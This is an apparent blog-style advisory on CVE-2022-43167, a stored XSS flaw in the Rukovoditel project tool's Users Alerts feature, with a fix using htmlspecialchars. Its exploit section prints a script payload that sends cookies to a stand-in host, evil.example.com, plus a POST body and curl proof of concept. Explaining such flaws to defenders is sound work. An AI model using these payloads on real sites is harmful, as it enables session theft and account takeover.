In October 2022, a critical stored cross-site scripting (XSS) vulnerability surfaced in Rukovoditel, a popular open source project management tool (official site). If you’re running version 3.2.1 or similar, your platform might be letting attackers plant malicious scripts, putting your users—and your data—at risk.
This post explains the vulnerability, how it could be abused, and how you can check if you’re exposed.
What Is CVE-2022-43167?
CVE-2022-43167 refers to a stored XSS flaw found in Rukovoditel’s Users Alerts feature. An authenticated attacker can inject malicious JavaScript by manipulating the “Title” parameter when they add a new alert.
When another user later views the alert, the attacker’s script runs in their browser—potentially stealing login tokens, redirecting them to fake pages, or executing other malicious actions.
Official Notice
- NVD Summary: CVE-2022-43167
- Exploit Database: EDB-ID: 51203
The vulnerability exists in this endpoint
/index.php?module=users_alerts/users_alerts
Save the new alert.
Because the app doesn’t sanitize or encode the input, the payload gets stored in the database. Whenever a user or admin sees the alert, the browser processes the script.
The Exploit: Step-by-Step
Let’s see exactly how an attacker could exploit this bug.
1. Craft Your Payload
A classic XSS attack uses JavaScript to pop an alert, steal information, or perform harmful actions.
Example malicious Title
<script>alert('XSS! Your session may be at risk.');</script>
To be stealthier, an attacker might use code that grabs the user’s cookie
<script>fetch('https://evil.example.com/steal?c='+document.cookie)</script>
Send a POST request or use the UI
POST /index.php?module=users_alerts/users_alerts&action=create
POST data example:
title=<script>alert('XSS')</script>&description=anything
3. The Payload Gets Stored
Because the input isn’t sanitized or escaped, it goes directly into the database.
4. The Script Executes
Any user who views this alert triggers the malicious script.
Full PoC (Proof of Concept) Example
Here’s a curl command to automate the attack (you must replace COOKIE_VALUE with an actual login cookie):
curl -b "PHPSESSID=COOKIE_VALUE" \
-d "title=<script>alert('XSS')</script>&description=Test" \
-X POST "https://victim-site.com/index.php?module=users_alerts/users_alerts&action=create";
If you’re testing this (in a safe environment), you’ll see the JavaScript alert whenever you access the Users Alerts in the app UI.
Defacement: Attackers could inject unsavory content, damaging trust.
Remember: The attacker needs to be authenticated, but Rukovoditel is often used as a team tool, so gaining some level of access is not always hard in open environments.
If you’re running Rukovoditel 3.2.1 (or any version not patched), you should
1. Update: The easiest and safest fix is to upgrade to the latest secure version. Rukovoditel has downloads here.
2. Sanitize your input: If you need an emergency patch, make sure any user input is sanitized using PHP built-ins like htmlspecialchars().
Example before fix
echo $alert['title'];
Example after fix
echo htmlspecialchars($alert['title'], ENT_QUOTES, 'UTF-8');
Original Links and References
- CVE-2022-43167 — NVD Entry
- Exploit DB Proof of Concept
- Rukovoditel Project Homepage
- Github Advisory Database
Wrapping Up
CVE-2022-43167 is a simple, but dangerous, flaw in Rukovoditel 3.2.1’s Users Alerts. If you’re running this version, patch immediately or sanitize inputs using the guide above.
Stored XSS isn’t just a theoretical risk—it can lead to major incidents with a few lines of code. Always validate and escape user data, and stay on top of app updates.
*Found this useful? Protect your apps! For a hands-on test, consider using XSS scanners or working with security professionals.*
Timeline
Published on: 10/28/2022 17:15:00 UTC
Last modified on: 11/01/2022 17:33:00 UTC